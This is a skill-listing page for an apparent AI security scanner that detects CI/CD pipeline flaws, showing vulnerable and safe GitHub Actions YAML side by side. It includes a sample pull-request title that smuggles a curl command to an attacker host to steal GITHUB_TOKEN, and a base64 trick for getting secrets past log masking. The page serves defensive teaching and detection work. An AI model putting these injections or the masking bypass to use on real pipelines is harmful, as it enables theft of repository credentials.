원클릭으로
sc-ci-cd
CI/CD pipeline security — GitHub Actions injection, secret exposure, untrusted actions, and artifact poisoning
Codex 또는 Claude로 설치 이 Prompt를 복사해 Codex, Claude 또는 다른 어시스턴트에 붙여 넣으면 Skill 페이지를 검토하고 설치를 진행할 수 있습니다.
메뉴
CI/CD pipeline security — GitHub Actions injection, secret exposure, untrusted actions, and artifact poisoning
Codex 또는 Claude로 설치 이 Prompt를 복사해 Codex, Claude 또는 다른 어시스턴트에 붙여 넣으면 Skill 페이지를 검토하고 설치를 진행할 수 있습니다.
SOC 직업 분류 기준
Comprehensive AI-powered security scanning suite with 48 skills covering OWASP Top 10, 7 language-specific deep scanners (Go, TypeScript, Python, PHP, Rust, Java, C#), supply chain analysis, infrastructure-as-code scanning, and 3000+ checklist items. Use when you need to run a security audit, find vulnerabilities, scan a PR for security issues, or perform a penetration test on a codebase.
C#/.NET-specific security deep scan
Go-specific security deep scan
Java/Kotlin-specific security deep scan
PHP-specific security deep scan
Python-specific security deep scan
| name | sc-ci-cd |
| description | CI/CD pipeline security — GitHub Actions injection, secret exposure, untrusted actions, and artifact poisoning |
| license | MIT |
| metadata | {"author":"ersinkoc","category":"security","version":"1.0.0"} |
Detects CI/CD pipeline security vulnerabilities with deep focus on GitHub Actions expression injection, pull_request_target misuse, untrusted third-party actions, secret exposure in logs, artifact poisoning, and pipeline privilege escalation. Also covers GitLab CI and general pipeline security patterns.
Called by sc-orchestrator during Phase 2 when CI/CD configuration files are detected.
**/.github/workflows/*.yml, **/.github/workflows/*.yaml,
**/.gitlab-ci.yml, **/Jenkinsfile, **/.circleci/config.yml,
**/.travis.yml, **/azure-pipelines.yml
1. Expression Injection (Critical):
# VULNERABLE: User-controlled data in run command
- run: echo "Title: ${{ github.event.pull_request.title }}"
# PR title: "Fix $(curl attacker.com/steal?t=$GITHUB_TOKEN)" → RCE
# SAFE: Use environment variable (not interpreted by shell)
- run: echo "Title: $TITLE"
env:
TITLE: ${{ github.event.pull_request.title }}
Dangerous contexts: github.event.pull_request.title, github.event.pull_request.body,
github.event.issue.title, github.event.issue.body, github.event.comment.body,
github.event.review.body, github.event.head_commit.message,
github.event.commits[*].message, github.head_ref
2. pull_request_target with Checkout:
# VULNERABLE: Checking out PR code with write access
on: pull_request_target
jobs:
build:
steps:
- uses: actions/checkout@v4
with:
ref: ${{ github.event.pull_request.head.sha }} # PR code!
- run: npm install # Runs attacker's package.json scripts!
3. Untrusted Actions:
# RISKY: Mutable tag reference
- uses: some-org/some-action@v1 # Tag can be moved to malicious commit
# SAFE: Pin to SHA
- uses: some-org/some-action@a1b2c3d4e5f6... # Immutable
4. Excessive GITHUB_TOKEN Permissions:
# VULNERABLE: Default write-all permissions
# (no permissions block = write access to everything)
# SAFE: Minimal permissions
permissions:
contents: read
pull-requests: write
5. Secret Exposure:
# VULNERABLE: Secret in command output
- run: echo "Deploying with key ${{ secrets.DEPLOY_KEY }}"
# Secrets are masked, but can be exfiltrated via encoding
- run: echo "${{ secrets.API_KEY }}" | base64 # Bypasses masking!
include: remote: loading untrusted templates